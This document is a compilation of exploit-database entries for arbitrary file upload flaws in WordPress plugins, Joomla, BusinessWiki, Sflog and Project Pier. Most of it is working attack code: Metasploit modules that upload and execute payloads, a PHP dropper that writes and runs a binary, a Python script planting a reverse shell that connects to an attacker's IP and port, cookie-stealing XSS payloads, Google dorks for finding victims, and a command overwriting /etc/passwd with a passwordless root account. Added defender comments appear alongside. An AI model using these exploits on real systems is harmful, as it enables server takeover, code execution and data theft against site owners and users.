##################################################
# Description : Wordpress Plugins - Front-end Editor Arbitrary File Upload Vulnerability
# Version : 2.2.1
# link : http://wordpress.org/extend/plugins/front-end-editor/
# Software : http://downloads.wordpress.org/plugin/front-end-editor.2.2.1.zip
# Date : 04-07-2012
# Google Dork : inurl:/wp-content/plugins/front-end-editor/
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit : PostShell.php
<?php
// PoC against the Aloha Editor "draganddropfiles" demo uploader bundled with
// this plugin. The request below is a raw POST body plus an X-File-Name
// header; the file is then fetched under the same demo directory by the name
// given in that header (see "Shell Access" line), so the demo script appears
// to honour a client-chosen name and extension with no session check.
// Defender view: vendor demo/sample handlers should not ship in production
// deployments; upload handlers need authentication plus a server-side
// extension allowlist, and directories that receive uploads should be served
// without a PHP handler. Detection: POSTs to .../demo/upload.php carrying an
// X-File-Name header, or new .php files appearing under that demo path.
$headers = array("Content-Type: application/octet-stream", "X-File-Name: lo.php"); // name the upload is stored under
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "<?php phpinfo(); ?>"); // raw request body is the file content
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it directly
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch); // NOTE: returns false on transport failure; not checked
curl_close($ch);
print "$postResult";
?>
Shell Access : http://localhost/wordpress/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/lo.php
WordPress Plugins – Front-end Editor Arbitrary File Upload Vulnerability
WordPress Generic plugins Arbitrary File Upload (Metasploit)
##
# $Id: wp_gupload.rb 2012-07-09 04:35:01Z KedAns-Dz $
##

require 'msf/core'

# Generic "multipart POST a PHP file to a plugin upload script, then GET it"
# module; the plugin path and the upload directory are both operator options.
# Defender view: the underlying weakness is an upload handler reachable without
# a WordPress session that stores client-named files under the web root.
# Mitigations: require authentication/capability checks (and a nonce) on every
# upload endpoint, allowlist extensions server-side, and disable PHP execution
# under wp-content/uploads and plugin upload directories.
# Detection: multipart POSTs to plugin .php files carrying a "Filedata" part
# whose filename ends in .php, followed by a GET of that same name.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Generic plugins Arbitrary File Upload',
      'Description'    => %q{ This module exploits an arbitrary PHP File Upload and Code Execution flaw in some WordPress blog software plugins. The vulnerability allows for arbitrary file upload and remote code execution POST Data to Vulnerable Script/File in the plugin. },
      'Author'         => [ 'KedAns-Dz <ked-h[at]1337day.com>' ], # MSF Module
      'License'        => MSF_LICENSE,
      'Version'        => '0.1', # Beta Version Just for Pene-Test/Help - Wait the Best !
      # NOTE(review): the framework expects each reference as a [type, value]
      # pair; these are four flat strings, so they will not render as references.
      'References'     => [ 'URL', 'http://1337day.com/related/18686', 'URL', 'http://packetstormsecurity.org/search/?q=wordpress+shell+upload' ],
      'Privileged'     => false,
      'Payload'        => { 'Compat' => { 'ConnectionType' => 'find', }, },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Jun 16 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The URI path to WordPress", "/"]),
        OptString.new('PLUGIN', [true, "The Full URI path to Plugin and Vulnerable File", "/"]),
        OptString.new('UDP', [true, "Full Path After Upload", "/"])
        # Example :
        # set TARGETURI http://127.0.0.1/wp
        # set PLUGIN wp-content/plugins/foxypress/uploadify/uploadify.php
        # set UDP wp-content/affiliate_images/
        # set RHOST 127.0.0.1
        # set PAYLOAD php/exec
        # set CMD echo "toor::0:0:::/bin/bash">/etc/passwd
        # exploit
      ], self.class)
  end

  # Presence check only: an HTTP 200 for the configured plugin path shows the
  # script exists, not that it accepts uploads, hence CheckCode::Detected.
  def check
    uri = datastore['TARGETURI']
    plug = datastore['PLUGIN']
    # NOTE(review): the single quotes around / are inside the double-quoted
    # string, so the requested path literally contains the three characters '/'.
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => "#{uri}'/'#{plug}"
    })
    if res and res.code == 200
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Builds a single-part multipart body (field "Filedata", random .php name),
  # POSTs it to PLUGIN, parses the stored name out of a JSON-looking reply
  # (`raw_file_name`), then requests UDP/<name>.php to trigger the payload.
  def exploit
    uri = datastore['TARGETURI']
    plug = datastore['PLUGIN']
    path = datastore['UDP']
    peer = "#{rhost}:#{rport}"
    post_data = Rex::MIME::Message.new
    post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")
    print_status("#{peer} - Sending PHP payload")
    # Same literal '/' issue as in check (see note there).
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => "#{uri}'/'#{plug}",
      'ctype' => 'multipart/form-data; boundary=' + post_data.bound,
      'data' => post_data.to_s
    })
    # Success is inferred from a 200 plus a {"raw_file_name":"<word>", fragment
    # in the body; the capture is reused as $1 below (no regex runs in between).
    if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
      print_error("#{peer} - File wasn't uploaded, aborting!")
      return
    end
    print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => "#{uri}'/'#{path}'/'#{$1}.php"
    })
    # A nil res (no reply) is silently ignored here; only non-200 is reported.
    if res and res.code != 200
      print_error("#{peer} - Server returned #{res.code.to_s}")
    end
  end
end
WordPress editormonkey Arbitrary File Upload Vulnerability
######################################################################################## # # Exploit Title : Wordpress (editormonkey) Arbitrary File Upload Vulnerability # # Author : IrIsT.Ir # # Discovered By : Am!r # # Home : http://IrIsT.Ir/forum # # Software Link : http://wordpress.org # # Security Risk : High # # Version : All Version # # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # # Dork : intext:"Powered By Wordpress" # ######################################################################################## # # Expl0iTs : # # http://target.com/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/browser/default/browser.html # ######################################################################################## # # Greats : B3HZ4D - Crim3R - nimaarek - 0x0ptim0us - Net.Edit0r - A.Cr0x - G3n3rall - # # R3ZA BLACK HAT - TaK.FaNaR - m3hdi - F () rid - joker_s - H4x0r - dr.tofan - skote_vahshat - # # d3c0d3r - Dr.Security - Mr.Xpr - Bl4ck_king - hellboy - Shekaf & All Members In IrIsT.Ir # ######################################################################################## |
Joomla KISS Advertiser Remote File & Bypass Upload Vulnerability
############################################################################
# Exploit Title: Joomla com_KSAdvertiser Remote File & Bypass Upload Vulnerability
# Google Dork: inurl:index.php?option=com_ksadvertiser
# Date: [12-07-2012]
# Author: Daniel Barragan "D4NB4R"
# Twitter: @D4NB4R
# site: http://www.insecurityperu.org/
# vendor Link: http://www.kiss-software.de
# Tested on: [Linux(arch)-Windows(7ultimate)]
#
1. Some sites require you to register first (Registrese - Algunas paginas lo exigen): http://site/index.php?option=com_user&view=login
2. Go to the upload path (Dirijase a la ruta del upload): http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
3. Go to Images and click Upload, browse to your file shell.php, and rename it to shell.php.gif (Vaya a imagenes y dele click a upload, examine su archivo shell.php y renombrelo a shell.php.gif)
4. Locate your file under the site root at /images/ksadvertiser/U0 -> this may vary (Busque su archivo en la raiz /images/ksadvertiser/U0 --> esta puede variar): http://site/images/ksadvertiser/U0/403.php.gif
I am not responsible for the use that is made of this (No me hago responsable del uso que se le de)
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"
WordPress Cimy User Extra Fields 2.3.7 Shell Upload
# Exploit Title: wordpress plugin Cimy User Extra Fields Arbitrary File Upload Vulnerability
# Google Dork: inurl:"inurl:/wp-content/Cimy_User_Extra_Fields"
# Date: 07/18/2012
# Author: Crim3R
# plugin download Link : http://downloads.wordpress.org/plugin/cimy-user-extra-fields.2.3.7.zip
# Version: 2.3.7
# Tested on: all
========================================
The avatar upload can be found in the registration form with extra fields, or in the user's profile with extra fields, which is available to all types of users. An attacker can upload a shell in many ways, for example by modifying headers or ...
shell access : http://wordpress/wp-content/Cimy_User_Extra_Fields/username/avatar.jpg.php
===============Crim3R@Att.Net===========
$home = http://Secure-Land.net
thanks to : 2MzRp - Mikili - Amir - 0x0ptim0us - iC0d3R - farbodmahini and all Secure-land Members...
WordPress chenpress Plugin Arbitrary File Upload Vulnerability
######################################################################################## # # Exploit Title : Wordpress (chenpress Plugin) Arbitrary File Upload Vulnerability # # Author : IrIsT.Ir # # Discovered By : Am!r # # Home : http://IrIsT.Ir/forum # # Software Link : http://wordpress.org # # Security Risk : High # # Version : All Version # # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # # Dork : inurl:"wp-content/plugins/chenpress" # ######################################################################################## # # Expl0iTs : # # http://target.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html # ######################################################################################## # # Greats : B3HZ4D - Crim3R - nimaarek - 0x0ptim0us - R3ZA BLACK HAT - TaK.FaNaR - m3hdi - F () rid # # H4x0r - dr.tofan - skote_vahshat - d3c0d3r - Dr.Security - Mr.Xpr - Bl4ck_king - hellboy # # Siamak_Black - Shekaf & All Members In IrIsT.Ir # ######################################################################################## |
WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload Vulnerability
# Exploit Title: WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload Vulnerability # Date: 7/23/12 # Exploit Author: Chris Kellum # Vendor Homepage: http://mondaybynoon.com/ # Software Link: http://downloads.wordpress.org/plugin/front-end-upload.0.5.4.4.zip # Version: 0.5.4.4 ===================== Vulnerability Details ===================== Plugin does not properly filter filetypes, which allows for the upload of filetypes in the following format: filename.php.jpg Vulnerable hosts will serve such files as a php file, allowing for malicious files to be uploaded and executed. In creating the uploads folder for this plugin, the code utilizes uniqid to add a unique string to the upload folder name in order to better hide it from direct access. Example: /wp-content/uploads/feu_9fc12558ac71e6995808cfc590207e87/ However, many WordPress installations allow direct access to the /wp-content/uploads/ folder, so simply look for a folder name beginning with 'feu_' to locate your upload. =================== Disclosure Timeline =================== 7/13/2012 - Vendor notified 7/23/2012 - Version 0.5.4.6 released 7/23/2012 - Public disclosure |
BusinessWiki 2.5RC3 Stored XSS & Arbitrary File Upload
#!/usr/bin/python
'''
# Exploit Title: Stored XSS & Arbitrary File Upload Vulnerabilities in BusinessWiki.
# Date: 23/08/2012
# Exploit Author: Shai rod (@NightRang3r)
# Vendor Homepage: http://onbusinesswiki.com/
# Software Link: http://sourceforge.net/projects/businesswiki/files/
# Version: 2.5RC3
#Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar

About the Application:
======================
BusinessWiki is an Enterprise-level Wiki available under the GPL licence.
BusinessWiki is based on MediaWiki core.

Vulnerability Description
=========================
1. Stored XSS in Page Comments.
It is possible to inject malicious Javascript code into page comments.
Steps to reproduce the issue:
1.1. Select a page.
1.2. At the bottom of the page insert the following Javascript payload into the "Comments" field: <script>alert("XSS")</script>
1.3. Click "Add".
1.4. XSS should be triggered.
This XSS will execute for all users visiting this page.

2. Stored XSS In User Profile.
Steps to reproduce the issue:
2.1. Click on your user name at the top right of the page where it says "Logged in as: username".
2.2. Click on the "Contact Information" - "Edit this" link.
2.3. Vulnerable fields: "Phones", "IMs", "Others". Insert the Javascript payload: <script>alert("XSS")</script>
2.4. Click the "Update" button.
2.5. Click the "See the changes" link.
2.6. The XSS should be triggered.
This XSS will be triggered when users view your malicious profile via the "User directory".

3. Arbitrary File Upload.
BusinessWiki uses FCKEditor; it is possible to use the following page to upload malicious files onto the server:
http://192.168.1.10/extensions/FCKeditor/fckeditor/editor/filemanager/connectors/uploadtest.html
Although FCKEditor restricts upload of certain file types, it is possible to bypass this restriction.
Proof-of-concept exploit code is provided.

Defender notes (review): the PoC below declares the part as a .txt/text-plain
file and places the intended name, with a trailing "%00", in the
client-controlled CurrentFolder query parameter; the file is afterwards
requested under /userfiles/ with a .php extension. Mitigations: reject NUL
bytes and path separators in connector parameters, validate the extension of
the final stored name rather than the declared one, and serve /userfiles/
without a PHP handler. Detection: requests to connectors/php/upload.php whose
query string contains "%00", and new .php files under /userfiles/.
'''
# Python 2 script (print statements, urllib2).
import urllib2, sys, random, string, time
print "################################################"
print "# BusinessWiki Arbitrary File Upload RCE POC #"
print "# Coded by: Shai rod #"
print "# @NightRang3r #"
print "# http://exploit.co.il #"
print "# For Educational Purposes Only! #"
print "################################################\r\n"
# Three positional arguments: base URL, callback address, callback port.
if len(sys.argv) < 4:
    print ('Usage: ' + sys.argv[0] + ' remote_host attacker_ip attacker_port')
    print('e.g: ' + sys.argv[0] + ' http://example.com 192.68.1.10 4444')
    sys.exit(1)
target = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]
shell_sleep = 10
print "\n[*] Generating Random File Name..."
# Six distinct characters from [A-Z0-9] (random.sample does not repeat).
chars = string.ascii_uppercase + string.digits
file_name = ''.join(random.sample(chars ,6))
print "[+] File Name: " + file_name
# Multipart body assembled by hand with a fixed boundary (must match the
# Content-Type header below); the part is declared as <name>.txt, text/plain.
data = ''' -----------------------------1655174106359 Content-Disposition: form-data; name="NewFile";''' + " filename=" + '"' + file_name + '.txt"' + "\n"
data += "Content-Type: text/plain\r\n"
data += ''' <?php $addr=$_REQUEST['addr']; $port=$_REQUEST['port']; if (!($sock=fsockopen($addr,$port))) die; while (!feof($sock)) { $cmd = fgets($sock); $pipe = popen($cmd,'r'); while (!feof($pipe)) fwrite ($sock, fgets($pipe)); pclose($pipe); } fclose($sock); ?> -----------------------------1655174106359-- '''
print "[*] Uploading Shell..."
# Stored name comes from CurrentFolder (see defender notes in the docstring).
url = (target + '/extensions/FCKeditor/fckeditor/editor/filemanager/connectors/php/upload.php?time=&CurrentFolder=/' + file_name + '.php%00')
headers = {'Content-Type' : 'multipart/form-data; boundary=---------------------------1655174106359'}
req = urllib2.Request (url ,data ,headers)
response = urllib2.urlopen(req)  # raises urllib2.HTTPError/URLError on failure; not handled, result unused
print "[+] Please setup a netcat listener on port " + port + ", Shell will be triggered in " + str(shell_sleep) + " seconds..."
time.sleep(shell_sleep)
# NOTE(review): the printed location uses "&addr=" while the request below uses
# "?addr="; the display string is not a valid URL as shown.
print "[+] Shell Location: " + (target + "/userfiles/" + file_name + ".php&addr=" + ip + "&port=" + port)
opener = urllib2.build_opener()
trigger = opener.open(target + "/userfiles/" + file_name + ".php?addr=" + ip + "&port=" + port)  # response unused
print "[X] Bye..."
WordPress TDO Mini Forms Arbitrary File Upload
# Exploit Title: Wordpress "TDO Mini Forms" File Upload Vulnerability # Google Dork: "tdomf-upload-inline.php?tdomf_form_id=1 index" # Date: 31/9/12 # Exploit Author: HodLuM # Vendor Homepage: unknown # Software Link: http://thedeadone.net/download/tdo-mini-forms-wordpress-plugin/ # Version: All # Tested on: 2.x.x to 3.x.x # Email: h0dlmx@yahoo.com - hodlum@live.com ~#Exploit: site.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index= ~#Uploaded files go to: site.com/wp-content/plugins/tdo-mini-forms/attachments/FILE.* |
Sflog! CMS 1.0 Arbitrary File Upload
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Sflog! CMS 1.0: default admin credential ("admin:secret") + an authenticated
# blog-content upload that stores the file under a web-served, PHP-executing
# path (blogs/download/uploads/).
# Defender view: force a credential change at install time, keep uploaded
# content out of PHP-executing locations (or deny the handler there), and
# validate the stored extension server-side. Detection: POST admin/login.php
# with the default pair, then a multipart POST to admin/manage.php with a
# fileID part named *.php, then a GET of blogs/download/uploads/<name>.php.
# Forensics: the "Linux x86" target also writes /tmp/<random>.bin on the host
# (see get_write_exec_payload); @clean_files records only the bare name, so
# on_new_session's rm does not address that /tmp path and it may remain.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Sflog! CMS 1.0 Arbitrary File Upload Vulnerability",
      'Description'    => %q{ This module exploits multiple design flaws in Sflog 1.0. By default, the CMS has a default admin credential of "admin:secret", which can be abused to access administrative features such as blogs management. Through the management interface, we can upload a backdoor that's accessible by any remote user, and then gain arbitrary code execution. },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'dun',     #Discovery, PoC
          'sinn3r'   #Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '83767'],
          ['EDB', '19626']
        ],
      'Payload'        => { 'BadChars' => "\x00" },
      'DefaultOptions' => { 'ExitFunction' => "none" },
      'Platform'       => ['linux', 'php'],
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jul 06 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base directory to sflog!', '/sflog/']),
        OptString.new('USERNAME', [true, 'The username to login with', 'admin']),
        OptString.new('PASSWORD', [true, 'The password to login with', 'secret'])
      ], self.class)
  end

  # Fingerprints the front page by a hidden "sitesearch" input pointing at the
  # vendor domain; this only proves the product is present (Detected).
  def check
    target_uri.path << '/' if target_uri.path[-1,1] != '/'
    base = File.dirname("#{target_uri.path}.")
    res = send_request_raw({'uri'=>"#{base}/index.php"})
    if not res
      return Exploit::CheckCode::Unknown
    elsif res and res.body =~ /\<input type\=\"hidden\" name\=\"sitesearch\" value\=\"www\.thebonnotgang\.com\/sflog/  # `res and` is redundant after the nil branch above
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  #
  # Embed our binary in PHP, and then extract/execute it on the host.
  #
  # NOTE(review): the `data` parameter is never used; the method calls
  # generate_payload_exe itself, so the caller's `bin` is generated twice.
  #
  def get_write_exec_payload(fname, data)
    p = Rex::Text.encode_base64(generate_payload_exe)
    php = %Q| <?php $f = fopen("#{fname}", "wb"); fwrite($f, base64_decode("#{p}")); fclose($f); exec("chmod 777 #{fname}"); exec("#{fname}"); ?> |
    php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ')
    return php
  end

  # Session callback: removes each entry of @clean_files as given (relative
  # names), via the meterpreter fs API or a plain `rm` on a shell session.
  def on_new_session(cli)
    if cli.type == "meterpreter"
      cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
    end

    @clean_files.each do |f|
      print_status("#{@peer} - Removing: #{f}")
      begin
        if cli.type == 'meterpreter'
          cli.fs.file.rm(f)
        else
          cli.shell_command_token("rm #{f}")
        end
      rescue ::Exception => e
        print_error("#{@peer} - Unable to remove #{f}: #{e.message}")
      end
    end
  end

  #
  # login unfortunately is needed, because we need to make sure blogID is set, and the upload
  # script (uploadContent.inc.php) doesn't actually do that, even though we can access it
  # directly.
  #
  # Returns the raw Set-Cookie header on success, '' otherwise. Success means
  # a PHPSESSID cookie was issued and the body lacks the "Access denied" marker.
  #
  def do_login(base)
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => "#{base}/admin/login.php",
      'vars_post' => {
        'userID' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      }
    })

    if res and res.headers['Set-Cookie'] =~ /PHPSESSID/ and res.body !~ /\<i\>Access denied\!\<\/i\>/
      return res.headers['Set-Cookie']
    else
      return ''
    end
  end

  #
  # Upload our payload, and then execute it.
  #
  # The form fields (blogID, contentType, MAX_FILE_SIZE) mirror the manage.php
  # form; the file part is declared text/plain but keeps the .php name.
  # Only a 404 on the follow-up GET is treated as failure; a nil response
  # there still falls through to handler.
  #
  def upload_exec(cookie, base, php_fname, p)
    data = Rex::MIME::Message.new
    data.add_part('download', nil, nil, "form-data; name=\"blogID\"")
    data.add_part('7', nil, nil, "form-data; name=\"contentType\"")
    data.add_part('3000', nil, nil, "form-data; name=\"MAX_FILE_SIZE\"")
    data.add_part(p, 'text/plain', nil, "form-data; name=\"fileID\"; filename=\"#{php_fname}\"")

    # The app doesn't really like the extra "\r\n", so we need to remove the newline.
    post_data = data.to_s
    post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => "#{base}/admin/manage.php",
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data,
      'cookie' => cookie,
      'headers' => {
        'Referer' => "http://#{rhost}#{base}/admin/manage.php",
        'Origin' => "http://#{rhost}"
      }
    })

    if not res
      print_error("#{@peer} - No response from host")
      return
    end

    target_path = "#{base}/blogs/download/uploads/#{php_fname}"
    print_status("#{@peer} - Requesting '#{target_path}'...")
    res = send_request_raw({'uri'=>target_path})
    if res and res.code == 404
      print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}")
      return
    end

    handler
  end

  # Entry point: login with the configured credentials, build the per-target
  # payload (inline PHP, or a PHP dropper for the ELF written to /tmp), upload
  # and request it.
  def exploit
    @peer = "#{rhost}:#{rport}"

    target_uri.path << '/' if target_uri.path[-1,1] != '/'
    base = File.dirname("#{target_uri.path}.")

    print_status("#{@peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
    cookie = do_login(base)
    if cookie.empty?
      print_error("#{@peer} - Unable to login")
      return
    end

    php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"
    @clean_files = [php_fname]

    case target['Platform']
    when 'php'
      p = "<?php #{payload.encoded} ?>"
    when 'linux'
      bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
      @clean_files << bin_name  # bare name only; the file itself is written to /tmp/ below
      bin = generate_payload_exe
      p = get_write_exec_payload("/tmp/#{bin_name}", bin)
    end

    upload_exec(cookie, base, php_fname, p)
  end
end
Project Pier Arbitrary File Upload
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Project Pier: tools/upload_file.php accepts a multipart upload with no
# authentication and echoes the stored path, which is then requested under
# tools/. The stored name ends in ".php.1"; per the module description this
# depends on how Apache maps handlers across multiple extensions.
# Defender view: authenticate the upload tool, derive the stored name
# server-side, and scope the PHP handler to the final extension only (e.g. an
# anchored FilesMatch) or deny execution under tools/upload/. Detection:
# multipart POSTs to tools/upload_file.php with a filename containing ".php",
# followed by a GET of tools/upload/<folder>/<name>.php.1-NNNN.
# Forensics: the "Linux x86" target writes /tmp/<random>.bin on the host;
# @clean_files holds bare names only, so on_new_session's rm does not address
# that /tmp path and it may remain on disk.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Project Pier Arbitrary File Upload Vulnerability",
      'Description'    => %q{ This module exploits a vulnerability found in Project Pier. The application's uploading tool does not require any authentication, which allows a malicious user to upload an arbitrary file onto the web server, and then cause remote code execution by simply requesting it. This module is known to work against Apache servers due to the way it handles an extension name, but the vulnerability may not be exploitable on others. },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'BlackHawk',
          'sinn3r'
        ],
      'References'     =>
        [
          ['OSVDB', '85881'],
          ['URL', 'http://packetstormsecurity.org/files/117070/ProjectPier-0.8.8-Shell-Upload.html']
        ],
      'Platform'       => ['linux', 'php'],
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
        ],
      # NOTE(review): a module-level ARCH_CMD alongside per-target ARCH_PHP /
      # ARCH_X86 looks inconsistent; the targets' Arch values are what matter.
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'DisclosureDate' => "Oct 8 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the web application', '/pp088/'])
      ], self.class)
  end

  # Version fingerprint from the login page banner (0.8.0–0.8.8) combined with
  # an Apache Server header; both are needed for CheckCode::Vulnerable.
  def check
    target_uri.path << '/' if target_uri.path[-1,1] != '/'
    base = File.dirname("#{target_uri.path}.")

    res = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => "#{base}/index.php",
        'vars_get' => { 'c' => 'access', 'a' => 'login' }
      })

    if res and res.body =~ /Welcome to ProjectPier 0\.8\.[0-8]/ and res.headers['Server'] =~ /^Apache/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Wraps a base64 ELF in a PHP dropper that writes, chmods and runs it.
  # NOTE(review): the `data` parameter is unused; generate_payload_exe is
  # called again here, so the caller's `bin` is generated twice.
  def get_write_exec_payload(fname, data)
    p = Rex::Text.encode_base64(generate_payload_exe)
    php = %Q| <?php $f = fopen("#{fname}", "wb"); fwrite($f, base64_decode("#{p}")); fclose($f); exec("chmod 777 #{fname}"); exec("#{fname}"); ?> |
    php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ')
    return php
  end

  # Session callback: removes each @clean_files entry as given (relative
  # names) via the meterpreter fs API or a plain `rm` on a shell session.
  def on_new_session(cli)
    if cli.type == "meterpreter"
      cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
    end

    @clean_files.each do |f|
      print_debug("#{@peer} - Removing: #{f}")
      begin
        if cli.type == 'meterpreter'
          cli.fs.file.rm(f)
        else
          cli.shell_command_token("rm #{f}")
        end
        print_debug("File removed: #{f}")
      rescue ::Exception => e
        print_error("#{@peer} - Unable to remove #{f}: #{e.message}")
      end
    end
  end

  # POSTs the four-part form (folder, file, part, submit) to upload_file.php.
  # Returns the response body, or nil when no response came back.
  # NOTE(review): the file part's `name=file` is unquoted while the other
  # parts quote their names; kept as is since it is a runtime string.
  def upload_php(base, fname, php_payload, folder_name)
    data = Rex::MIME::Message.new
    data.add_part(folder_name, nil, nil, 'form-data; name="folder"')
    data.add_part(php_payload, nil, nil, "form-data; name=file; filename=\"#{fname}\"")
    data.add_part('', nil, nil, 'form-data; name="part"')
    data.add_part('Submit', nil, nil, 'form-data; name="submit"')
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => "#{base}/tools/upload_file.php",
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    })

    return res.body if res
  end

  # Extracts the stored path from the upload reply and requests it.
  # NOTE(review): if the body holds no "/..." match, `uri` is nil and
  # File.basename(nil) raises TypeError rather than reporting a failed upload.
  def exec_php(base, body)
    # Body example:
    # 0 ./upload/test/test.txt-0001
    uri = body.scan(/(\/.+$)/).flatten[0]
    @clean_files << File.basename(uri)
    res = send_request_raw({'uri' => "#{base}/tools#{uri}"})
    if res and res.code == 404
      print_error("#{@peer} - The upload most likely failed")
      return
    end

    handler
  end

  # Entry point: random folder and ".php.1" file name, per-target payload,
  # upload, then exec_php on the returned body.
  def exploit
    @peer = "#{rhost}:#{rport}"

    target_uri.path << '/' if target_uri.path[-1,1] != '/'
    base = File.dirname("#{target_uri.path}.")

    folder_name = Rex::Text.rand_text_alpha(4)
    php_fname = "#{Rex::Text.rand_text_alpha(5)}.php.1"
    @clean_files = []

    case target['Platform']
    when 'php'
      p = "<?php #{payload.encoded} ?>"
    when 'linux'
      bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
      @clean_files << bin_name  # bare name only; the file is written to /tmp/ below
      bin = generate_payload_exe
      p = get_write_exec_payload("/tmp/#{bin_name}", bin)
    end

    print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
    res = upload_php(base, php_fname, p, folder_name)
    if not res
      print_error("#{@peer} - No response from server")
      return
    end

    print_status("#{@peer} - Executing '#{php_fname}'...")
    exec_php(base, res)
  end
end
WordPress Daily Edition Mouss XSS / Disclosure / Shell Upload
------------------------- Affected products: ------------------------- Vulnerable are all versions of Daily Edition Mouss theme for WordPress (to SQLi, IL, XSS, FPD and to AoF, DoS, AFU only earlier versions are vulnerable). ---------- Details: ---------- Information Leakage (SQL DB Structure Extraction) (WASC-13): http://site/wp-content/themes/dailyedition-mouss//fiche-disque.php Leakage of SQL query with tables' names (including table prefix). XSS (WASC-08): http://site/wp-content/themes/dailyedition-mouss//fiche-disque.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Full path disclosure (WASC-13): http://site/wp-content/themes/dailyedition-mouss/ Besides index.php there are also potentially FPD in other php-files of this theme. XSS (WASC-08): http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg Full path disclosure (WASC-13): http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http:// http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1&w=1111111 http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1111111&w=1 Abuse of Functionality (WASC-42): http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site&h=1&w=1 